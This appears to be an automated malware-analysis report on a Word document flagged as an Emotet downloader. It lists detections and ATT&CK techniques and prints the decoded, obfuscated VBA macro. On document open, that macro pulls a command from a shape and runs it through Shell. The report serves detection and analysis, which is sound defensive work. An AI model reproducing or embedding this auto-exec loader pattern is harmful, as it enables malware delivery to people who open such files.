MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute a heavily obfuscated command line. This command line, when deobfuscated, invokes cmd.exe to set up variables and then uses PowerShell to download and execute a second-stage payload from multiple URLs. The ClamAV detection 'Doc.Downloader.Emotet-6826481-0' strongly suggests the Emotet family, which commonly uses this download-and-execute pattern.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826481-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826481-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
taIpTIBw = CByte(4096188) zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6858 bytes |
SHA-256: f0786dba06ccf80d390345addc774a59446196b181d0e4240f03382579af7cd6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
153 of 225 identifiers look randomly generated (e.g. 'ZrWtuVwWYRp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sdvuizalhTIAu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
lMBAuLS = Atn(Plvhqmcw)
ZEkup = CLng(azaujZqlq)
cpPid = Cos(tXFWNpE)
BHMQZ = CByte(kfvPbAUQ)
OYzFbOwN = CByte(91035398)
AKNoTjk = CBool(310068097)
tcNaMDV = tAHdEcorz
kcmEuw = 299007284
cXrcjqF = CByte(308735430)
On Error Resume Next
XMQhqUnG = Atn(wptOa)
odUXhA = CLng(zmlts)
uYlnFkjui = Cos(OlSaauC)
UpOLAUz = CByte(nRPivzb)
LjKBniuXK = CByte(29660489)
lPZfC = CBool(235606247)
ZDbiX = oizPfz
RKUOukB = 269665402
vqBwONHNl = CByte(81845991)
On Error Resume Next
uwtHKpn = Atn(jZnQA)
INmtpVn = CLng(qHWvSvS)
AVhKhzKJ = Cos(bkBVI)
iaHOG = CByte(oDipRH)
kPWrpzYR = CByte(233361900)
tJCcjNllH = CBool(226826819)
nVLjM = MSDVPrY
uEsMXjl = 335682939
OFDmEpsD = CByte(68329564)
Set wtLKcaMz = Shapes("FoWFMbvif")
On Error Resume Next
VQTIzIp = Atn(fXTGF)
ivAmmc = CLng(cXOjWzjTP)
GZtCKslb = Cos(IsCpr)
USlbUKFS = CByte(ssFYbIFi)
mMhLRY = CByte(22214756)
KhTzai = CBool(148708994)
ChwsuaBHL = RmMAw
KlCiF = 55562292
MXFzY = CByte(333999993)
On Error Resume Next
OjTpE = Atn(VCYAobo)
KpmbjV = CLng(MojBswJ)
iqZUriwQ = Cos(TPzML)
kGbPpooz = CByte(mnCukoLZ)
PuJPHw = CByte(250796483)
ZfHQYI = CBool(7611859)
wuRhU = qrohDcEfT
qlzQd = 137219493
idiOIsUNf = CByte(6169025)
On Error Resume Next
GDpnh = Atn(cirkfuVVi)
iRXQzNQj = CLng(VVapYL)
ofNkkoaj = Cos(cLBvba)
jEkOkcHtm = CByte(YMYCp)
YuFqIz = CByte(11987589)
qoBWBPnnu = CBool(149393617)
lnwAMXUzd = OLLmsc
VkqiC = 278429604
wakrXTk = CByte(119631527)
GLLYAI = wtLKcaMz.TextFrame.ContainingRange
On Error Resume Next
fviOzbL = Atn(nGrGHWUN)
ujVlhh = CLng(pTjCVL)
vwwKpGcjm = Cos(jOIwbIiHt)
jcjlwN = CByte(YjsITb)
wHJMiH = CByte(262869582)
waBTZQ = CBool(91304233)
AvbsHS = MMcrEA
mQntCTwWd = 254886581
VfFjinzK = CByte(135826882)
On Error Resume Next
AjkjSIUw = Atn(hDpHfLZ)
wjTnAu = CLng(ipribFlc)
ClspiMno = Cos(NfwSV)
pIQNPAwA = CByte(zBcQqWPw)
EFtSkjm = CByte(295116917)
inOqMUE = CBool(268607137)
oXNkFl = rcjXw
zjUNPtWY = 217694898
WVOMZHp = CByte(51598721)
On Error Resume Next
wwHjQI = Atn(vDVWrd)
RNVpjz = CLng(NbvpPJ)
qRRdJ = Cos(fjjKdYpdU)
NhAjGNBG = CByte(dBkWMtA)
HEmEthhnh = CByte(216052613)
MIKmtt = CBool(221715585)
PZzdP = BjuvNU
cZhYhi = 129936211
TwZjq = CByte(300834749)
On Error Resume Next
CAjJTbXGI = Atn(iHUaKjWS)
OFoZJO = CLng(XqZdBlwu)
KNVCjjm = Cos(DZYFw)
GrFZXmNba = CByte(mEhhihzJZ)
AVBPl = CByte(204846459)
hVjpcZ = CBool(454578)
mwLbIL = maQiCFcW
Ofwpkpp = 265119536
TjGrFJihO = CByte(289628402)
On Error Resume Next
qizhYWHM = Atn(IMcjhsfql)
ziCGcsq = CLng(ZoaYiz)
UXKulq = Cos(tKiazDdkR)
OzhCoYVph = CByte(hYWkd)
VNUUwAl = CByte(342159918)
rcCsnnpW = CBool(215866422)
jSKfz = FDkSUotwW
PPzzONhR = 322440673
SzuSrBpbu = CByte(68950230)
On Error Resume Next
UvKjp = Atn(fOQip)
jizbJmHok = CLng(QshDPAc)
IPYVcdHz = Cos(dYUYzBF)
TNJRMYQUz = CByte(RBmmfmi)
aWLBTUK = CByte(93334150)
PPwRrbJ = CBool(315987451)
TVvqIAfz = zmqtiucaj
RupGwtAF = 332187348
aZcqtS = CByte(58428090)
On Error Resume Next
pudnG = Atn(piPpRo)
QSmaWDj = CLng(SUarcW)
NFqJnzar = Cos(DPJFsvE)
RJIbm = CByte(KwcjWZDv)
sCUJzIA = CByte(146577069)
bOWHuiZXQ = CBool(142012186)
TOKaVfM = QERUHm
CXlEwQ = 256679784
AYMDCw = CByte(62802093)
Const ZrWtuVwWYRp = 0
On Error Resume Next
tMpuOj = Atn(NBkurvJCN)
EclKfOT = CLng(swhEZw)
bHzJGa = Cos(QTSPI)
vuOwU = CByte(OsnGN)
VaWjOJbli = CByte(106733753)
JtHzBLSr = CBool(103602683)
OYwik = XjTnAlLl
jjFJo = 147759237
fFEDNCM = CByte(212197293)
On Error Resume Next
RcGfYZSwR = Atn(injGz)
PFIip = CLng(GbdJlsop)
jTYJrr = Cos(cnDjcLYi)
tCqwGSG = CByte(lVfCP)
ZJcvCTKw = CByte(40592208)
ccViGD = CBool(313960119)
zhrqw = FNMUYWMkN
iZAQVKSzw = 196918532
izczhZb = CByte(18562512)
On Error Resume Next
tuOTBqp = Atn(OYVTjn)
KjTGRo = CLng(AknVj)
tMpJENCrT = Cos(BEZAMH)
HsZQRfHV = CByte(pptdf)
JzUBjMOT = CByte(237711478)
rXRBsns = CBool(294691134)
fcHZb = ioEXNzqj
uZjKYWs = 166469312
taIpTIBw = CByte(4096188)
zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj)
On Error Resume Next
bnlqZGjpt = Atn(crCttXv)
mHltZGf = CLng(AnGNCvUP)
bvwNQEBR = Cos(jltSS)
mjYvJh = CByte(iLqFti)
ajWnFSbw = CByte(86059072)
DjcVWtp = CBool(225882047)
rbSWYFG = QnWKLS
dCPFMznp = 148816479
sZFsI = CByte(117044986)
On Error Resume Next
PrzNAjzq = Atn(kqZzLi)
fmIDQJ = CLng(rbHfhB)
fsQuGzDi = Cos(Zkjtd)
GakYRA = CByte(CzUFcIlt)
QoaEw = CByte(64222172)
FiNBl = CBool(228809429)
kPlZVj = IkoqpQaAX
sHVTrTYTw = 152105276
tDwDTjjp = CByte(278665600)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.